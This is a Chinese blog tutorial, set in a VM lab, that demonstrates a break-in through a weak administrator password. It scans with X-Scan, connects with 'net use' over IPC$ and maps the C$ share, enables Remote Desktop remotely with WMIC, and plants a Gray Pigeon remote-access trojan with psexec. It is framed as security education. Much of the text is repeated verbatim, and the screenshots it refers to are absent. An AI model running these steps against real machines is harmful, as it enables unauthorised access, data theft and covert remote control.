實驗環境:vm6.51(windows2003+winxp),如圖:
第一招:掃你沒商量
工具:x-scan-v3.3,在winxp上打開xcan,設置|掃描參數,輸入要掃描的主機:192.168.10.1,確定。
單擊開始掃描,xcan將會對192.168.10.1這臺主機開始全方位掃描:
掃描完成,xscan將會以網頁形勢報告掃描信息,將會看到管理員口令:
第二招:你的數據我做主
開始|運行:CMD.出現命令提示符,輸入net use \\192.168.10.1\ipc$ qwert /user:administrator
net use x: \\192.168.10.1\c$
打開我的電腦|x:,對方數據一覽無餘:
第三招:開你遠程,你的電腦我用用
測試遠程桌面是否開啓,連接失敗:
開始|運行:cmd,輸入代碼:Wmic /node:192.168.10.1 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1,輸入管理員口令:
再遠程桌面連接,開始|遠行:mstsc,連接成功:
第四招:種個***,神不知鬼不覺
打開灰鴿子,點擊配置服務程序,ip通知:192.168.10.2,保存路徑爲c:\,點成生成服務器端:
拷貝工具軟件psexec.exe到c:\:
開始運行,輸入以下命令,點擊agree,如圖:
打開灰鴿子程序,發現192.168.10.1已上線:
發個信息警言一下:
看一下結果:
網絡安全教育演示用,弱口令真的很危險!!!
工具:x-scan-v3.3,在winxp上打開xcan,設置|掃描參數,輸入要掃描的主機:192.168.10.1,確定。
單擊開始掃描,xcan將會對192.168.10.1這臺主機開始全方位掃描:
掃描完成,xscan將會以網頁形勢報告掃描信息,將會看到管理員口令:
第二招:你的數據我做主
開始|運行:CMD.出現命令提示符,輸入net use \\192.168.10.1\ipc$ qwert /user:administrator
net use x: \\192.168.10.1\c$
打開我的電腦|x:,對方數據一覽無餘:
第三招:開你遠程,你的電腦我用用
測試遠程桌面是否開啓,連接失敗:
開始|運行:cmd,輸入代碼:Wmic /node:192.168.10.1 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1,輸入管理員口令:
再遠程桌面連接,開始|遠行:mstsc,連接成功:
第四招:種個***,神不知鬼不覺
打開灰鴿子,點擊配置服務程序,ip通知:192.168.10.2,保存路徑爲c:\,點成生成服務器端:
拷貝工具軟件psexec.exe到c:\:
開始運行,輸入以下命令,點擊agree,如圖:
打開灰鴿子程序,發現192.168.10.1已上線:
發個信息警言一下:
看一下結果:
網絡安全教育演示用,弱口令真的很危險!!!
本文出自 “IT動手實驗營” 博客,請務必保留此出處http://netwj.blog.51cto.com/715492/229240